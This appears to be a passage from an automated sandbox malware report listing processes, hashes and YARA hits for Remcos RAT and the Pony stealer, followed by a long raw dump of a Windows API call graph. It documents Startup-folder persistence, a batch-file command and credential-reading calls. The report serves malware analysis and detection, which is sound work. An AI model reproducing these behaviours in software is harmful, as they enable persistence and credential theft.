                                              Path:C:\Users\user\AppData\Local\Temp\SGS.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\SGS.exe"
                                              Imagebase:0x400000
                                              File size:853'504 bytes
                                              MD5 hash:31B2F8C329A601B145E7E71A6D120A7B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:Borland Delphi
                                              Reputation:low
                                              Has exited:true

                                              Target ID:11
                                              Start time:11:57:53
                                              Start date:13/12/2024
                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
                                              Imagebase:0x400000
                                              File size:917'504 bytes
                                              MD5 hash:21D13F2F3C4DB8F083B672D81831FA5E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              Target ID:12
                                              Start time:11:57:55
                                              Start date:13/12/2024
                                              Path:C:\Users\user\AppData\Local\Temp\SGS.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\SGS.exe
                                              Imagebase:0x400000
                                              File size:853'504 bytes
                                              MD5 hash:31B2F8C329A601B145E7E71A6D120A7B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: pony, Description: Identify Pony, Source: 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                              Reputation:low
                                              Has exited:true

                                              Target ID:13
                                              Start time:11:57:57
                                              Start date:13/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5249171.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:14
                                              Start time:11:57:57
                                              Start date:13/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2143868303.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2220000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a5e4e2b3691246fd291f0ad1a53b97275ad19edd271169cf4831239db7ec05da
                                                • Instruction ID: 28f1880550f891e5c3b6630ef184ca88fc3c85a1f7fc5f4aeb60d29868deb5d2
                                                • Opcode Fuzzy Hash: a5e4e2b3691246fd291f0ad1a53b97275ad19edd271169cf4831239db7ec05da
                                                • Instruction Fuzzy Hash: 3FE1467241D7D16FCB128BB0AAA22917F78FE1331DB1914DAC4C18F0A7D362592ED792

                                                Execution Graph

                                                Execution Coverage:28.4%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:12.3%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:31
                                                execution_graph: node and edge data of the interactive execution graph (function addresses with the Windows API calls made at each node, e.g. MultiByteToWideChar, StgOpenStorage, LogonUserA, CryptUnprotectData, CertOpenSystemStoreA, CryptExportKey, InternetCrackUrlA, ShellExecuteA); the raw rendering data is not reproduced here.
9165->9167 9166->9161 9168 401d71 6 API calls 9167->9168 9172 40c909 9168->9172 9169 40c94c 9170 4018b8 LocalFree 9169->9170 9171 40c962 9170->9171 9173 4018b8 LocalFree 9171->9173 9172->9169 9176 4015cb lstrlen 9172->9176 9174 40c96a 9173->9174 9178 40c936 9176->9178 9180 4015cb lstrlen 9178->9180 9181 40c941 9180->9181 9183 4015cb lstrlen 9181->9183 9183->9169 9185 40a0b6 9184->9185 9186 401eb1 7 API calls 9185->9186 9187 40a0c0 9186->9187 9188 404351 41 API calls 9187->9188 9194 40a0dd 9187->9194 9191 40a0d8 9188->9191 9189 40a0ee StrStrIA 9189->9194 9190 40a133 9190->8686 9192 4018b8 LocalFree 9191->9192 9192->9194 9193 40242b 9 API calls 9193->9194 9194->9189 9194->9190 9194->9193 9195 404351 41 API calls 9194->9195 9196 4018b8 LocalFree 9194->9196 9195->9194 9196->9194 9198 40d9b3 9197->9198 10936 40d965 9198->10936 9201 40d965 46 API calls 9202 40d9ca 9201->9202 9203 40d965 46 API calls 9202->9203 9204 40d9d4 9203->9204 9205 40439c 46 API calls 9204->9205 9206 40d9eb 9205->9206 9206->8686 9208 4069b2 9207->9208 9209 40439c 46 API calls 9208->9209 9210 4069cc 9209->9210 9210->8686 9212 407e32 9211->9212 10945 407bba RegOpenKeyA 9212->10945 9215 407bba 14 API calls 9216 407e5a 9215->9216 9216->8686 9218 4015f0 9217->9218 9219 40f834 GetCurrentDirectoryA 9218->9219 9220 409c3c 83 API calls 9219->9220 9221 40f86f 9220->9221 9222 409c3c 83 API calls 9221->9222 9223 40f88b SetCurrentDirectoryA GetCurrentDirectoryA 9222->9223 9224 409c3c 83 API calls 9223->9224 9225 40f8cf 9224->9225 9226 409c3c 83 API calls 9225->9226 9227 40f8eb SetCurrentDirectoryA 9226->9227 9228 40f902 9227->9228 9228->8686 9230 409031 9229->9230 10956 408fd3 9230->10956 9233 408fd3 46 API calls 9234 409048 9233->9234 9235 408fd3 46 API calls 9234->9235 9236 409052 9235->9236 9236->8686 9238 40c32f 9237->9238 9239 40c13d 46 API calls 9238->9239 9240 40c33f 9239->9240 9240->8686 9242 40a22e 9241->9242 9243 40439c 46 API calls 9242->9243 9244 40a248 9243->9244 9244->8686 9246 40cfad 9245->9246 
10967 40ccda 9246->10967 9249 401eb1 7 API calls 9250 40cfbf 9249->9250 9251 40cfe1 9250->9251 9252 4041a6 41 API calls 9250->9252 9251->8686 9253 40cfdc 9252->9253 9254 4018b8 LocalFree 9253->9254 9254->9251 9256 40dead 9255->9256 10987 40dc62 RegOpenKeyA 9256->10987 9259 40dc62 14 API calls 9260 40ded5 9259->9260 9260->8686 9262 40e8ad 9261->9262 10998 40e85d 9262->10998 9264 40e8c2 9264->8686 9266 40d7a8 9265->9266 11021 40d5c0 RegOpenKeyA 9266->11021 9268 40d7b8 9268->8686 9270 40a028 9269->9270 9271 401d71 6 API calls 9270->9271 9272 40a042 9271->9272 9273 40a05f 9272->9273 9274 404351 41 API calls 9272->9274 9275 401d71 6 API calls 9273->9275 9276 40a05a 9274->9276 9277 40a076 9275->9277 9278 4018b8 LocalFree 9276->9278 9279 40a093 9277->9279 9280 404351 41 API calls 9277->9280 9278->9273 9279->8686 9281 40a08e 9280->9281 9282 4018b8 LocalFree 9281->9282 9282->9279 9284 406927 9283->9284 9285 40439c 46 API calls 9284->9285 9286 406941 9285->9286 9287 401d71 6 API calls 9286->9287 9291 40695a 9287->9291 9288 406984 11032 40668f RegOpenKeyA 9288->11032 9290 406991 9290->8686 9291->9288 9292 4018b8 LocalFree 9291->9292 9292->9288 9294 404aa7 9293->9294 11044 40491b RegOpenKeyA 9294->11044 9297 40491b 14 API calls 9298 404ac4 9297->9298 9299 40491b 14 API calls 9298->9299 9300 404ad1 9299->9300 11055 40480d RegOpenKeyA 9300->11055 9303 40480d 10 API calls 9304 404aeb 9303->9304 9305 40480d 10 API calls 9304->9305 9306 404af8 9305->9306 9306->8686 9308 406d26 9307->9308 9309 40439c 46 API calls 9308->9309 9310 406d40 9309->9310 9310->8686 9312 40f0a5 9311->9312 9313 40439c 46 API calls 9312->9313 9314 40f0bf 9313->9314 9315 40439c 46 API calls 9314->9315 9316 40f0d6 9315->9316 9317 40439c 46 API calls 9316->9317 9318 40f0ed 9317->9318 9319 40439c 46 API calls 9318->9319 9320 40f104 9319->9320 11064 40ef6c 9320->11064 9326 40b024 9325->9326 11105 40aed7 RegOpenKeyA 9326->11105 9328 40b034 9328->8686 9330 4015f0 9329->9330 9331 409fa4 GetCurrentDirectoryA 9330->9331 
9332 409c3c 83 API calls 9331->9332 9333 409fdf 9332->9333 9334 409c3c 83 API calls 9333->9334 9335 409ffb SetCurrentDirectoryA 9334->9335 9336 40a012 9335->9336 9336->8686 9338 40c99c 9337->9338 9339 401d71 6 API calls 9338->9339 9340 40c9b2 9339->9340 9341 40c9d9 9340->9341 9342 40242b 9 API calls 9340->9342 9341->8686 9343 40c9bc 9342->9343 9343->9341 9344 404351 41 API calls 9343->9344 9345 40c9d4 9344->9345 9346 4018b8 LocalFree 9345->9346 9346->9341 9348 40759b 9347->9348 11193 4073a7 RegOpenKeyA 9348->11193 9351 4073a7 14 API calls 9352 4075c3 9351->9352 9352->8686 9354 4015f0 9353->9354 9355 409f1d GetCurrentDirectoryA 9354->9355 9356 409c3c 83 API calls 9355->9356 9357 409f58 9356->9357 9358 409c3c 83 API calls 9357->9358 9359 409f74 SetCurrentDirectoryA 9358->9359 9360 409f8b 9359->9360 9360->8686 9362 40e919 9361->9362 9363 401d71 6 API calls 9362->9363 9364 40e933 9363->9364 9365 40e950 9364->9365 9367 404351 41 API calls 9364->9367 9366 401d71 6 API calls 9365->9366 9369 40e966 9366->9369 9368 40e94b 9367->9368 9370 4018b8 LocalFree 9368->9370 9371 40e983 9369->9371 9372 404351 41 API calls 9369->9372 9370->9365 9373 401d71 6 API calls 9371->9373 9374 40e97e 9372->9374 9375 40e99a 9373->9375 9376 4018b8 LocalFree 9374->9376 9377 40e9b7 9375->9377 9379 404351 41 API calls 9375->9379 9376->9371 9378 401d71 6 API calls 9377->9378 9380 40e9cd 9378->9380 9381 40e9b2 9379->9381 9382 40e9ea 9380->9382 9384 404351 41 API calls 9380->9384 9383 4018b8 LocalFree 9381->9383 9382->8686 9383->9377 9385 40e9e5 9384->9385 9386 4018b8 LocalFree 9385->9386 9386->9382 9388 40df74 9387->9388 9389 401d71 6 API calls 9388->9389 9390 40df8e 9389->9390 9391 40dfab 9390->9391 9392 404351 41 API calls 9390->9392 9393 40439c 46 API calls 9391->9393 9394 40dfa6 9392->9394 9396 40dfc2 9393->9396 9395 4018b8 LocalFree 9394->9395 9395->9391 9396->8686 9398 407697 9397->9398 11204 4075d2 RegOpenKeyA 9398->11204 9401 4075d2 9 API calls 9402 4076bf 9401->9402 9403 4075d2 9 API calls 
9402->9403 9404 4076d2 9403->9404 9405 4075d2 9 API calls 9404->9405 9406 4076e4 9405->9406 9406->8686 9408 405f16 9407->9408 11212 405e8b 9408->11212 9411 405e8b 46 API calls 9412 405f3d 9411->9412 9412->8686 9414 4015f0 9413->9414 9415 409e96 GetCurrentDirectoryA 9414->9415 9416 409c3c 83 API calls 9415->9416 9417 409ed1 9416->9417 9418 409c3c 83 API calls 9417->9418 9419 409eed SetCurrentDirectoryA 9418->9419 9420 409f04 9419->9420 9420->8686 9431 407a93 9421->9431 9422 407b66 11227 407a33 9422->11227 9423 407aab StrStrA 9424 407b08 StrStrIA 9423->9424 9423->9431 9424->9431 9426 407ac4 lstrlen 9429 40242b 9 API calls 9426->9429 9428 40242b 9 API calls 9428->9431 9429->9431 9430 407a33 46 API calls 9432 407b7a 9430->9432 9431->9422 9431->9423 9431->9426 9431->9428 9436 404351 41 API calls 9431->9436 9439 4018b8 LocalFree 9431->9439 9433 407a33 46 API calls 9432->9433 9434 407b84 9433->9434 11238 4078c8 RegOpenKeyA 9434->11238 9436->9431 9438 4078c8 48 API calls 9440 407ba9 9438->9440 9439->9431 9440->8686 9442 40e611 9441->9442 9443 40439c 46 API calls 9442->9443 9444 40e62b 9443->9444 9444->8686 9446 40c211 9445->9446 9447 40c13d 46 API calls 9446->9447 9448 40c221 9447->9448 9448->8686 9450 404614 9449->9450 9451 404635 GetVersionExA 9450->9451 9452 404657 9451->9452 11249 40446a GetModuleHandleA 9452->11249 9454 40469d 11255 4018cf LocalAlloc 9454->11255 9456 4046b0 GetLocaleInfoA 11256 40159f 9456->11256 9458 4046df GetLocaleInfoA 9459 404708 9458->9459 11258 4044d2 9459->11258 9461 40470d 11266 40456c 9461->11266 9476 40cb86 9475->9476 9477 401d71 6 API calls 9476->9477 9478 40cb9c 9477->9478 9479 40cba0 StrStrIA 9478->9479 9480 40cbdf 9478->9480 9481 40cbb4 9479->9481 9482 40cbd7 9479->9482 9480->8686 9484 40242b 9 API calls 9481->9484 9483 4018b8 LocalFree 9482->9483 9483->9480 9485 40cbbc 9484->9485 9486 4041a6 41 API calls 9485->9486 9487 40cbd2 9486->9487 9488 4018b8 LocalFree 9487->9488 9488->9482 9490 40c702 9489->9490 11297 40c67f 9490->11297 9493 
40c67f 46 API calls 9494 40c719 9493->9494 9495 40c67f 46 API calls 9494->9495 9496 40c723 9495->9496 9496->8686 9498 40cc00 9497->9498 9499 40439c 46 API calls 9498->9499 9500 40cc1a 9499->9500 9500->8686 9502 4055ff 9501->9502 11314 4054c8 9502->11314 9505 4054c8 24 API calls 9506 405632 9505->9506 9507 4054c8 24 API calls 9506->9507 9508 40564a 9507->9508 9509 4054c8 24 API calls 9508->9509 9510 405662 9509->9510 9511 4054c8 24 API calls 9510->9511 9512 40567a 9511->9512 9513 4054c8 24 API calls 9512->9513 9514 405692 9513->9514 9515 4054c8 24 API calls 9514->9515 9516 4056aa 9515->9516 9517 4054c8 24 API calls 9516->9517 9542 40c2fe 9541->9542 9543 40c13d 46 API calls 9542->9543 9544 40c30e 9543->9544 9544->8686 9546 40c77b 9545->9546 11361 40c732 9546->11361 9549 40c732 46 API calls 9550 40c792 9549->9550 9551 40c732 46 API calls 9550->9551 9552 40c79c 9551->9552 9552->8686 9554 4015f0 9553->9554 9555 407e7e GetWindowsDirectoryA 9554->9555 9556 407e96 9555->9556 9557 407ec2 9555->9557 9556->9557 9558 401df8 5 API calls 9556->9558 9557->8686 9559 407eae 9558->9559 9560 40406c 16 API calls 9559->9560 9561 407ebd 9560->9561 9562 4018b8 LocalFree 9561->9562 9562->9557 9564 406cf5 9563->9564 11370 406b1b RegOpenKeyA 9564->11370 9566 406d05 9566->8686 9568 40a269 9567->9568 9569 40439c 46 API calls 9568->9569 9570 40a283 9569->9570 9571 40439c 46 API calls 9570->9571 9572 40a29a 9571->9572 9572->8686 9574 406af2 9573->9574 9575 40439c 46 API calls 9574->9575 9576 406b0c 9575->9576 9576->8686 9578 407370 9577->9578 11380 40717c RegOpenKeyA 9578->11380 9581 40717c 14 API calls 9582 407398 9581->9582 9582->8686 9584 406670 9583->9584 11391 4063fd RegOpenKeyA 9584->11391 9586 406680 9586->8686 9588 40dbf0 9587->9588 11402 40d9fa RegOpenKeyA 9588->11402 9591 40d9fa 14 API calls 9592 40dc18 9591->9592 9592->8686 9594 4069ed 9593->9594 9595 40439c 46 API calls 9594->9595 9596 406a0e 9595->9596 9597 401d71 6 API calls 9596->9597 9598 406a25 9597->9598 9599 406a4d 9598->9599 
9600 401e4c 6 API calls 9598->9600 9599->8686 9601 406a34 9600->9601 9602 404351 41 API calls 9601->9602 9603 406a48 9602->9603 9604 4018b8 LocalFree 9603->9604 9604->9599 9606 40d36c 9605->9606 11413 40d072 RegOpenKeyA 9606->11413 9609 40d072 16 API calls 9610 40d394 9609->9610 11425 40d2cb 9610->11425 9613 40d2cb 21 API calls 9614 40d3af 9613->9614 9614->8686 9624 40ca6c 9615->9624 9616 40caba 9618 401eb1 7 API calls 9616->9618 9617 40ca7a StrStrIA 9617->9624 9619 40cac1 9618->9619 9621 40cae9 9619->9621 9622 401e4c 6 API calls 9619->9622 9620 40242b 9 API calls 9620->9624 9623 401eb1 7 API calls 9621->9623 9625 40cad0 9622->9625 9626 40caf0 9623->9626 9624->9616 9624->9617 9624->9620 9627 404351 41 API calls 9624->9627 9632 4018b8 LocalFree 9624->9632 9628 404351 41 API calls 9625->9628 9629 40cb18 9626->9629 9631 401e4c 6 API calls 9626->9631 9627->9624 9630 40cae4 9628->9630 9629->8686 9633 4018b8 LocalFree 9630->9633 9634 40caff 9631->9634 9632->9624 9633->9621 9635 404351 41 API calls 9634->9635 9636 40cb13 9635->9636 9637 4018b8 LocalFree 9636->9637 9637->9629 9639 40e8e3 9638->9639 9640 40e85d 46 API calls 9639->9640 9641 40e8f8 9640->9641 9641->8686 9643 407766 9642->9643 11435 4076f3 9643->11435 9646 4076f3 46 API calls 9647 40777d 9646->9647 9648 4076f3 46 API calls 9647->9648 9649 407787 9648->9649 9649->8686 9651 407865 9650->9651 11448 407796 9651->11448 9654 407796 29 API calls 9655 407880 9654->9655 9656 407796 29 API calls 9655->9656 9657 40788c 9656->9657 9658 407796 29 API calls 9657->9658 9659 40789b 9658->9659 9660 407796 29 API calls 9659->9660 9661 4078aa 9660->9661 9662 407796 29 API calls 9661->9662 9663 4078b9 9662->9663 9663->8686 9665 407ee3 9664->9665 9666 40439c 46 API calls 9665->9666 9667 407efd 9666->9667 9667->8686 9669 408f61 9668->9669 9670 40439c 46 API calls 9669->9670 9671 408f7b 9670->9671 11479 408d1e RegOpenKeyA 9671->11479 9674 408d1e 14 API calls 9675 408fa0 9674->9675 11490 408e0d RegOpenKeyA 9675->11490 9678 408e0d 53 
API calls 9679 408fc4 9678->9679 9679->8686 9681 404c63 9680->9681 11509 4018cf LocalAlloc 9681->11509 9683 404c70 GetWindowsDirectoryA 9684 404c84 9683->9684 9685 404c98 9683->9685 9684->9685 9687 404c8b 9684->9687 9686 4018b8 LocalFree 9685->9686 9688 404c96 9686->9688 11510 404b1e 9687->11510 9690 401eb1 7 API calls 9688->9690 9691 404ca7 9690->9691 9692 404b1e 28 API calls 9691->9692 9693 404cb0 9692->9693 9694 401eb1 7 API calls 9693->9694 9695 404cb7 9694->9695 9696 404ccf 9695->9696 9697 401e4c 6 API calls 9695->9697 9698 401eb1 7 API calls 9696->9698 9699 404cc6 9697->9699 9700 404cd6 9698->9700 9702 404b1e 28 API calls 9699->9702 9701 404cee 9700->9701 9703 401e4c 6 API calls 9700->9703 9704 401eb1 7 API calls 9701->9704 9702->9696 9705 404ce5 9703->9705 9753 40e5e0 9752->9753 11565 40e566 9753->11565 9755 40e5f0 9755->8686 9769 40c107 9756->9769 9759 40c107 46 API calls 9760 40c16e 9759->9760 9761 40c107 46 API calls 9760->9761 9762 40c185 9761->9762 9763 40c107 46 API calls 9762->9763 9764 40c19c 9763->9764 9765 40c107 46 API calls 9764->9765 9766 40c1b3 9765->9766 9767 40c107 46 API calls 9766->9767 9778 401eb1 9769->9778 9772 40c139 9772->9759 9773 401e4c 6 API calls 9774 40c11f 9773->9774 9787 4041a6 9774->9787 9777 4018b8 LocalFree 9777->9772 9811 4018cf LocalAlloc 9778->9811 9780 401ec2 9781 401ed0 SHGetFolderPathA 9780->9781 9782 401ece 9780->9782 9781->9782 9783 401f21 9781->9783 9784 4018b8 LocalFree 9782->9784 9783->9772 9783->9773 9785 401eee 9784->9785 9785->9783 9812 401d71 9785->9812 9788 4041c5 9787->9788 9790 4041c0 9787->9790 9789 4018b8 LocalFree 9788->9789 9791 40434d 9789->9791 9790->9788 9792 4041e5 9790->9792 9793 4041d6 9790->9793 9791->9777 9795 401df8 5 API calls 9792->9795 9794 401df8 5 API calls 9793->9794 9796 4041e3 9794->9796 9795->9796 9797 404209 FindFirstFileA 9796->9797 9797->9788 9806 404228 9797->9806 9808 4018b8 LocalFree 9806->9808 9811->9780 9813 401d7d 9812->9813 9816 401c8d 9813->9816 9817 401c9b RegOpenKeyExA 
9816->9817 9819 401d4a 9817->9819 9820 401cdb RegQueryValueExA 9817->9820 9821 401d6c 9819->9821 9824 401c8d 2 API calls 9819->9824 9822 401d42 RegCloseKey 9820->9822 9823 401cf6 9820->9823 9821->9785 9822->9819 9823->9822 9830 4018cf LocalAlloc 9823->9830 9824->9821 9826 401d12 RegQueryValueExA 9830->9826 10038 4063c8 10037->10038 10046 406207 10037->10046 10038->8787 10039 40620e RegEnumKeyExA 10040 406237 RegCloseKey 10039->10040 10039->10046 10040->10038 10042 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10042->10046 10043 401d71 6 API calls 10043->10046 10044 4018b8 LocalFree 10044->10046 10045 4015cb lstrlen 10045->10046 10046->10039 10046->10042 10046->10043 10046->10044 10046->10045 10047 4061e4 11 API calls 10046->10047 10047->10046 10049 406147 10048->10049 10057 405f6f 10048->10057 10049->8798 10050 405f76 RegEnumKeyExA 10051 405f9f RegCloseKey 10050->10051 10050->10057 10051->10049 10053 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10053->10057 10054 401d71 6 API calls 10054->10057 10055 4018b8 LocalFree 10055->10057 10056 4015cb lstrlen 10056->10057 10057->10050 10057->10053 10057->10054 10057->10055 10057->10056 10103 405844 10058->10103 10104 401d71 6 API calls 10103->10104 10105 40585d 10104->10105 10106 401d71 6 API calls 10105->10106 10107 405873 10106->10107 10108 401d71 6 API calls 10107->10108 10109 405889 10108->10109 10110 401d71 6 API calls 10109->10110 10111 4058a1 10110->10111 10112 401d71 6 API calls 10111->10112 10113 4058b7 10112->10113 10114 401d71 6 API calls 10113->10114 10117 4058cf 10114->10117 10115 4018b8 LocalFree 10116 405978 10115->10116 10137 40594b 10117->10137 10138 4015cb 10117->10138 10123 405906 10137->10115 10139 4015d4 lstrlen 10138->10139 10140 4015de 10138->10140 10139->10140 10140->10123 10142 4015fb 10141->10142 10142->8836 10144 404e92 10143->10144 10146 404e8d 10143->10146 10145 4018b8 LocalFree 10144->10145 10147 404ffb 10145->10147 10146->10144 10148 404eb2 10146->10148 10149 404ea3 10146->10149 
10147->8859 10151 401df8 5 API calls 10148->10151 10150 401df8 5 API calls 10149->10150 10152 404eb0 10150->10152 10151->10152 10153 404ed6 FindFirstFileA 10152->10153 10153->10144 10164 404ef5 10153->10164 10154 404f03 lstrcmpiA 10156 404f1a lstrcmpiA 10154->10156 10159 404f15 10154->10159 10155 404f68 StrStrIA 10157 404fcb FindNextFileA 10155->10157 10155->10164 10156->10159 10160 404fe5 FindClose 10157->10160 10157->10164 10158 401df8 5 API calls 10158->10164 10159->10157 10161 401df8 5 API calls 10159->10161 10163 401e4c 6 API calls 10159->10163 10166 404e73 24 API calls 10159->10166 10170 4018b8 LocalFree 10159->10170 10160->10144 10161->10159 10162 401e4c 6 API calls 10162->10164 10163->10159 10164->10154 10164->10155 10164->10158 10164->10162 10165 404fa6 StrStrIA 10164->10165 10167 404fbd 10164->10167 10165->10164 10166->10159 10169 4018b8 LocalFree 10167->10169 10182 404e5c 10167->10182 10169->10157 10170->10159 10172 401eb1 7 API calls 10171->10172 10173 405014 10172->10173 10174 40502f 10173->10174 10175 401df8 5 API calls 10173->10175 10176 404e73 31 API calls 10174->10176 10177 405026 10175->10177 10178 40503f 10176->10178 10179 4018b8 LocalFree 10177->10179 10180 4018b8 LocalFree 10178->10180 10179->10174 10181 405047 10180->10181 10181->8854 10183 40406c 16 API calls 10182->10183 10186 4041a6 41 API calls 10185->10186 10187 404367 10186->10187 10187->8875 10189 409c51 10188->10189 10190 409ca8 10188->10190 10191 401d71 6 API calls 10189->10191 10219 4018cf LocalAlloc 10190->10219 10193 409c63 10191->10193 10193->10190 10220 40242b 10193->10220 10194 409cb2 RegOpenKeyA 10195 409d38 10194->10195 10207 409cc8 10194->10207 10197 4018b8 LocalFree 10195->10197 10200 409d40 10197->10200 10198 409ccf RegEnumKeyExA 10201 409cf4 RegCloseKey 10198->10201 10198->10207 10200->8871 10201->10195 10202 409ca3 10205 4018b8 LocalFree 10202->10205 10204 401df8 5 API calls 10204->10207 10205->10190 10206 401eb1 7 API calls 10208 409c7c 10206->10208 10207->10198 
10207->10204 10209 401e4c 6 API calls 10207->10209 10211 409c3c 79 API calls 10207->10211 10215 4018b8 LocalFree 10207->10215 10209->10207 10211->10207 10215->10207 10219->10194 10221 401df8 5 API calls 10220->10221 10222 40243a lstrlen 10221->10222 10223 402458 StrStrIA 10222->10223 10224 402449 10222->10224 10225 402467 10223->10225 10226 40246b StrRChrIA 10223->10226 10224->10223 10225->10226 10227 402479 lstrlen 10226->10227 10229 40248c 10227->10229 10229->10202 10229->10206 10414 401eb1 7 API calls 10413->10414 10423 404351 41 API calls 10422->10423 10424 405c84 10423->10424 10425 404351 41 API calls 10424->10425 10426 405c99 10425->10426 10426->8898 10428 40e254 10427->10428 10429 40e37c 10427->10429 10430 401d71 6 API calls 10428->10430 10429->8919 10431 40e266 10430->10431 10432 401d71 6 API calls 10431->10432 10433 40e27b 10432->10433 10434 401d71 6 API calls 10433->10434 10435 40e292 10434->10435 10436 401d71 6 API calls 10435->10436 10437 40e2a7 10436->10437 10438 401d71 6 API calls 10437->10438 10442 40e2bc 10438->10442 10439 40e34c 10440 4018b8 LocalFree 10439->10440 10441 40e354 10440->10441 10443 4018b8 LocalFree 10441->10443 10442->10439 10470 4043dc 10442->10470 10444 40e35c 10443->10444 10451 40e2ef 10451->10439 10453 4015cb lstrlen 10451->10453 10461 40e445 10460->10461 10466 40e3a0 10460->10466 10461->8923 10462 40e3a7 RegEnumValueA 10463 40e3d5 RegCloseKey 10462->10463 10462->10466 10463->10461 10465 401d71 6 API calls 10465->10466 10466->10462 10466->10465 10467 40e402 StrStrIA 10466->10467 10469 4018b8 LocalFree 10466->10469 10476 40e0fe 10466->10476 10467->10466 10469->10466 10471 404461 10470->10471 10472 404405 10470->10472 10471->10451 10472->10471 10473 404422 CryptUnprotectData 10472->10473 10473->10471 10475 404432 10473->10475 10475->10471 10477 401f36 2 API calls 10476->10477 10478 40e10d 10477->10478 10479 40e111 10478->10479 10480 401ffd 7 API calls 10478->10480 10479->10466 10481 40e122 10480->10481 10482 40e230 10481->10482 
10496 4018cf LocalAlloc 10481->10496 10482->10466 10484 40e14b StrStrA 10485 40e15f lstrlen StrStrA 10484->10485 10487 40e15a 10484->10487 10486 40e184 lstrlen 10485->10486 10485->10487 10494 40e132 10486->10494 10489 4018b8 LocalFree 10487->10489 10488 402a1d 3 API calls 10488->10494 10490 40e227 10489->10490 10492 4018b8 LocalFree 10492->10494 10493 4043dc 2 API calls 10493->10494 10494->10484 10494->10487 10494->10488 10494->10492 10494->10493 10495 4015cb lstrlen 10494->10495 10495->10494 10496->10494 10498 401eb1 7 API calls 10497->10498 10499 405df3 10498->10499 10500 405e45 10499->10500 10501 401e4c 6 API calls 10499->10501 10500->8929 10502 405e02 10501->10502 10503 404351 41 API calls 10502->10503 10504 405e18 10503->10504 10505 404351 41 API calls 10504->10505 10506 405e2c 10505->10506 10507 404351 41 API calls 10506->10507 10508 405e40 10507->10508 10509 4018b8 LocalFree 10508->10509 10509->10500 10534 4018cf LocalAlloc 10510->10534 10512 40ea0c RegOpenKeyA 10513 40eb34 10512->10513 10524 40ea29 10512->10524 10514 4018b8 LocalFree 10513->10514 10516 40eb3f 10514->10516 10515 40ea30 RegEnumKeyExA 10517 40ea59 RegCloseKey 10515->10517 10515->10524 10516->8945 10517->10513 10519 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10519->10524 10520 401d71 6 API calls 10520->10524 10521 401df8 5 API calls 10523 40eaba GetPrivateProfileStringA 10521->10523 10522 40e9f9 45 API calls 10522->10524 10523->10524 10524->10515 10524->10519 10524->10520 10524->10521 10524->10522 10525 4018b8 LocalFree 10524->10525 10526 404351 41 API calls 10524->10526 10525->10524 10526->10524 10535 40436b 10527->10535 10530 40436b 46 API calls 10531 4043c5 10530->10531 10532 40436b 46 API calls 10531->10532 10533 4043d8 10532->10533 10534->10512 10536 401eb1 7 API calls 10535->10536 10537 404376 10536->10537 10538 404398 10537->10538 10539 401e4c 6 API calls 10537->10539 10538->10530 10540 404383 10539->10540 10541 404351 41 API calls 10540->10541 10542 404393 10541->10542 10543 
4018b8 LocalFree 10542->10543 10543->10538 10545 401eb1 7 API calls 10544->10545 10546 408c2c 10545->10546 10547 408c3f 10546->10547 10574 408ae5 10546->10574 10547->8953 10550 4018b8 LocalFree 10550->10547 10552 408980 10551->10552 10554 40897b 10551->10554 10553 4018b8 LocalFree 10552->10553 10555 408ae1 10553->10555 10554->10552 10556 4089a0 10554->10556 10557 408991 10554->10557 10555->8967 10559 401df8 5 API calls 10556->10559 10558 401df8 5 API calls 10557->10558 10560 40899e 10558->10560 10559->10560 10561 4089c4 FindFirstFileA 10560->10561 10561->10552 10575 408b04 10574->10575 10576 408aff 10574->10576 10578 4018b8 LocalFree 10575->10578 10576->10575 10577 401df8 5 API calls 10576->10577 10579 408b16 10577->10579 10580 408c1d 10578->10580 10581 408b2d FindFirstFileA 10579->10581 10580->10550 10581->10575 10586 408b4c 10581->10586 10582 408bed FindNextFileA 10584 408c07 FindClose 10582->10584 10582->10586 10583 408b5e lstrcmpiA 10585 408b78 lstrcmpiA 10583->10585 10583->10586 10584->10575 10585->10586 10586->10582 10586->10583 10587 401df8 5 API calls 10586->10587 10588 401e4c 